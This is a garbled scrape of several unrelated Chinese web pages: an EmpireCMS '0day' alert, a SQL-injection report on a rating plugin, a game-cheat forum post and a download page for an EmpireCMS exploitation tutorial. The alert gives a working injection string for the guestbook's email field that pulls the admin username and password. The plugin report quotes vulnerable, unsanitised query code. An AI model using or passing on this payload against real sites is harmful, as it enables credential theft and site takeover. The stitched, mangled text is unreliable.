您现在的位置：&&>>&&>>&&>>&帝国CMS 0day漏洞预警正文
帝国CMS 0day漏洞预警
帝国CMS 0day漏洞预警
作者/编辑：佚名
& & & & 来源 普瑞斯特& & 深灰丢出来的0day.& & 找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1& & 出来的是帝国CMS的留言本,在姓名处写:\\& & 联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from& & phome_enewsuser where userid=1),1,1,1,0,0,0)/*& & 提交后爆出账号密码
　　〔帝国CMS 0day漏洞预警〕随文赠言：【受惠的人，必须把那恩惠常藏心底，但是施恩的人则不可记住它。――西塞罗】
　　帝国CMS 0day漏洞预警所属栏目：〖〗
　　“帝国CMS 0day漏洞预警”相关
　　〖〗链接地址：
　　电脑资料提供的帝国CMS 0day漏洞预警由网友原创或转发，若帝国CMS 0day漏洞预警侵犯了您的权益，请与本站联系，谢谢！
上一篇资料： 下一篇资料：
帝国CMS 0day漏洞预警相关资料帝国CMS(EmpireCMS)商品评分插件注入漏洞-源码库|专注为中国站长提供免费商业网站源码下载！
当前位置:---帝国CMS(EmpireCMS)商品评分插件注入漏洞
帝国CMS(EmpireCMS)商品评分插件注入漏洞
漏洞作者： Varsog
提交时间：
公开时间：
漏洞类型： SQL注射漏洞
危害等级： 中
简要描述：
由于对参数的变量未作初始化检测导致 pf\rate.php 和 pf\ratemovie.php 中变量 $id 存在注入风险。
详细说明：&
$id&=&$_GET['id'];&
$query&=&&SELECT&infopfen,infopfennum&FROM&phome_ecms_shop&WHERE&id=$id&;&
$result&=&_query($query);&
$v&=&$_GET['v'];&
$id&=&$_GET['id'];&
$query&=&&UPDATE&phome_ecms_shop&SET&infopfen&=&infopfen&+&$v,infopfennum&=&infopfennum+1&WHERE&id=$id&;&
$result&=&mysql_query($query);&
$query&=&&SELECT&infopfen,infopfennum&FROM&phome_ecms_shop&WHERE&id=$id&;&
$result&=&mysql_query($query);&
漏洞证明：
相关漏洞发布：
相关资源下载：
漏洞发布搜索
漏洞发布推荐
热门源码推荐
热门漏洞发布
©2012传奇自己查找漏洞的方法，学会了以后自己找漏洞刷元宝，不再求人_传奇漏洞吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0可签7级以上的吧50个
本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：57,971贴子：
传奇自己查找漏洞的方法，学会了以后自己找漏洞刷元宝，不再求人
最近大家总是再找漏洞F但是找到的漏洞F大多都被人刷烂了进去也没什么意思了以前我也是无头苍蝇一样的跟风，但是最近，新发现了个新的论坛上面有好多种查看私服漏洞的方法进去以后先别忙，网页上面的部分是发无漏洞F的广告，下面才是论坛呢，看清楚了我查看了好几个漏洞了，上广告的f也可以刷元宝，漏洞刷，真是爽YY啊啊~
贴吧热议榜
使用签名档&&
保存至快速回贴帝国cms漏洞利用教程
软件大小：7.00 MB
软件语言：简体中文
软件类型：
软件授权：免费教程
更新时间：
开 发 商：
应用平台：WinXP, Win7, Win8, WinAll
网友评分：3
同类人气软件
帝国cms漏洞利用教程下载地址
帝国cms漏洞利用教程来自互联网, 如有侵犯您的版权, 请与我们
* 想展现您的技术风采吗,我们这个大舞台给您机会！有奖投稿方法:
* 站内软件和教程仅供技术研究，请于下载后24小时内自行删除，请勿用于非法用途否则后果自负！
* 站内软件和教程均由网友发布，切莫轻信软件和教程里的广告信息以防上当受骗
* 站内所有软件和教程已经通过本站检测安全，若您依然发现存在安全问题，敬请来信通知我们！}